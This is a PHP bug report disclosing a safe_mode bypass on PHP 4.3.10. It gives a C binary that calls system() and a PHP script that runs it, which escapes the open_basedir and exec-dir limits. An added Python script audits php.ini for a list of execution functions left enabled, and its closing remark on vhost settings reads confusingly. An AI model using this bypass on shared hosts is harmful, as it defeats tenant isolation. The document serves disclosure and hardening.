From: ricardi at gmail dot com
Operating system: *nix (Tested on Linux)
PHP version: 4.3.10
PHP Bug Type: Program Execution
Bug description: Execution functions bypass safe_mode configurations
Description:
------------
We bypassed the safe_mode restrictions using a binary with the "system" function
built in. The problem surfaced when we had an incident on a mass-virtualhost
machine: one of the domains executed a script that bypassed the safe_mode
restrictions such as open_basedir and safe_mode_exec_dir.
The configuration in the virtualhost was like:
<VirtualHost *>
    ServerName www.something.com
    ServerPath /mnt/nfs/domains/something.com.br/www
    php_admin_value open_basedir /mnt/nfs/domains/something.com.br/
    php_admin_value upload_tmp_dir /mnt/nfs/domains/something.com.br/
    php_admin_value safe_mode_include_dir /mnt/nfs/domains/something.com.br/
    php_admin_value safe_mode_exec_dir /mnt/nfs/domains/something.com.br/
    ...
</VirtualHost>
We created a simple program in C that creates a file outside the
open_basedir and executes a binary that isn't in the safe_mode_exec_dir:
/* ---------------
   Contents of file.c
   ---------------- */
#include <stdio.h>
#include <stdlib.h>   /* declares system() */

int main(void) {
    /* The child process is spawned by the binary itself, outside PHP's
       safe_mode checks, so neither open_basedir nor safe_mode_exec_dir
       applies to it. */
    system("find / -maxdepth 1 > /tmp/trash.txt");
    return 0;
}
Compiling: gcc -o file file.c
With FTP access, we put the file in the safe_mode_exec_dir:
> ls -la mnt/nfs/domains/something.com.br/
-rwxr-xr-x 1 nfsnobod nfsnobod 13576 Mar 22 16:57 file
Now create a PHP script that calls the binary:
<?php
    system("file");
?>
Then put this in the webroot and, after accessing the script at
http://www.something.com.br/script.php, check /tmp:
> ls -la /tmp
-rw-r--r-- 1 nfsnobody nfsnobody 139 Mar 22 21:00 trash.txt
We had to disable the execution feature from our product.
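The report's last sentence names the control that actually closes this path: safe_mode_exec_dir only restricts which binary PHP itself launches, and nothing in PHP can constrain what that binary spawns afterwards, so the server-side mitigation is to stop PHP from launching processes at all via disable_functions. The following audit script is an added example, not code from the bug report or from the PHP project; it parses php.ini text and reports which execution functions are still callable. The two ini snippets are constructed samples, and the EXEC_FUNCTIONS list is an assumed set of process-spawning functions, not an official PHP list.

```python
"""Audit php.ini text for disable_functions coverage of PHP's
process-execution functions (added example, not from the bug report)."""

import re

# Assumption: the process-spawning functions an administrator wants covered.
# Extend this for extensions present in a given PHP build.
EXEC_FUNCTIONS = frozenset({
    "system", "exec", "passthru", "shell_exec", "popen", "proc_open",
    "pcntl_exec",
})

# Matches a "disable_functions = ..." line and captures its value.
_DIRECTIVE = re.compile(r"^\s*disable_functions\s*=\s*(.*?)\s*$")


def parse_disable_functions(ini_text: str) -> set[str]:
    """Return the lower-cased function names listed in disable_functions.

    Strips ';' comments and optional quotes; when the directive appears
    more than once, the last occurrence wins (as PHP's ini parser does)."""
    disabled: set[str] = set()
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0]          # drop trailing ini comment
        m = _DIRECTIVE.match(line)
        if not m:
            continue
        value = m.group(1).strip().strip('"').strip("'")
        disabled = {f.strip().lower() for f in value.split(",") if f.strip()}
    return disabled


def missing_exec_functions(ini_text: str) -> set[str]:
    """Execution functions that remain callable under this configuration."""
    return set(EXEC_FUNCTIONS) - parse_disable_functions(ini_text)


# Constructed sample: safe_mode on, as in the report, but nothing disabled.
WEAK_INI = """\
safe_mode = On
safe_mode_exec_dir = /mnt/nfs/domains/something.com.br/
; disable_functions is left empty here
disable_functions =
"""

# Constructed sample: execution functions disabled, which prevents PHP from
# launching any binary, whatever is placed in safe_mode_exec_dir.
HARDENED_INI = """\
safe_mode = On
disable_functions = "system,exec,passthru,shell_exec,popen,proc_open,pcntl_exec"
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        gap = missing_exec_functions(text)
        status = "OK" if not gap else "still callable: " + ", ".join(sorted(gap))
        print(f"{name}: {status}")
```

Run it against a real php.ini (or the per-vhost php_admin_value output of phpinfo()) to confirm the gap is empty; note that disable_functions cannot be set per virtual host with php_value, only in php.ini or as php_admin_value, so an empty result in the global file can still be undone by nothing at the vhost level.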
--
Edit bug report at http://bugs.php.net/?id=32421&edit=1